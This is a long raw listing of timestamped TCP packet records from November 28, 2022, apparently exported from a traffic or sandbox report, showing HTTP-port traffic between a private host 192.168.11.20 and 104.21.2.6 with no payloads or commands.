                                                                    Nov 28, 2022 16:37:03.969508886 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.969508886 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.988452911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988575935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988591909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988617897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988630056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988641024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988651991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988662958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988673925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988677025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.988703966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988729000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988739967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988749981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988760948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988771915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988782883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.988881111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.988881111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989018917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989063025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989075899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989087105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989098072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989108086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989119053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989130020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989140034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989151001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989160061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989170074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989181042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989187002 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989213943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989227057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989238024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989249945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989260912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989285946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989296913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989306927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989317894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989329100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989340067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989350080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989360094 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989360094 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989370108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989381075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989391088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989402056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989412069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989423037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989433050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989444017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989454031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989464998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989475012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989484072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989526987 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989536047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.989613056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.989777088 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.016882896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.016988039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017002106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017014980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017025948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017036915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017047882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017052889 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017082930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017095089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017106056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017117977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017142057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017152071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017163038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017174006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017184973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017211914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017222881 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017229080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017240047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017251015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017261028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017271996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017282963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017297029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017307997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017426014 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017426014 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017501116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017513990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017525911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017537117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017546892 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017558098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017563105 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017587900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017601013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017611980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017623901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017636061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017647028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017745972 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.017781973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017793894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017805099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017817020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017841101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017853022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017863035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017874002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017884970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017894983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.017903090 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.018023014 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.018059015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018198013 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.018309116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018321037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018332005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018342018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.018347979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018358946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018369913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018379927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018390894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018400908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018409967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.018675089 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.038454056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038691998 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.038723946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038737059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038749933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038760900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038772106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038803101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038826942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038837910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038849115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038858891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038870096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038882017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038892031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038902998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038917065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038928032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038938999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038949966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038959026 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.038965940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038976908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038988113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.038997889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039009094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039019108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039027929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039038897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039154053 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039154053 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039189100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039216042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039227009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039237976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039247990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039258957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039269924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039279938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039290905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039299011 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039308071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039318085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039329052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039339066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039367914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039380074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039391994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039402962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039427042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039438009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039448977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039458990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039469004 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039474010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039484978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039495945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039505005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039688110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039688110 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.039736032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039750099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039761066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039772034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.039804935 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.040015936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040034056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.040034056 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.040051937 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040062904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040074110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040085077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040095091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040106058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040117025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040128946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040139914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040149927 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040162086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040170908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.040291071 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.040339947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.045578957 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.048374891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048576117 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.048691034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048705101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048719883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048731089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048742056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048752069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048763037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048774004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048784971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048795938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048806906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048818111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048829079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048839092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048850060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048861027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048871994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048878908 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.048891068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048902035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048913002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048923969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048927069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.048939943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048950911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048962116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048970938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.048981905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049098015 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049127102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049139977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049150944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049161911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049171925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049184084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049194098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049205065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049216032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049226999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049237967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049247980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049258947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049267054 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049276114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049287081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049298048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049308062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049318075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049329042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049339056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049350023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049360037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049371004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049381971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049391031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049473047 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049473047 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049631119 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049644947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049666882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049679995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049690962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049701929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049806118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049814939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049814939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.049823999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049834967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049845934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049856901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.049948931 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.050118923 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.054409981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054558039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054572105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054584026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054599047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054610014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.054677963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.054845095 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.063961983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064049006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064060926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064074039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064085960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064121962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064132929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064143896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064153910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064167023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064192057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064205885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064217091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064248085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064301014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064327002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064331055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064331055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064331055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064348936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064359903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064371109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064405918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064416885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064428091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064440012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064460039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064471006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064502001 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.064517021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064527988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064538956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064565897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.064578056 CET8049830104.21.2.6192.168.11.20
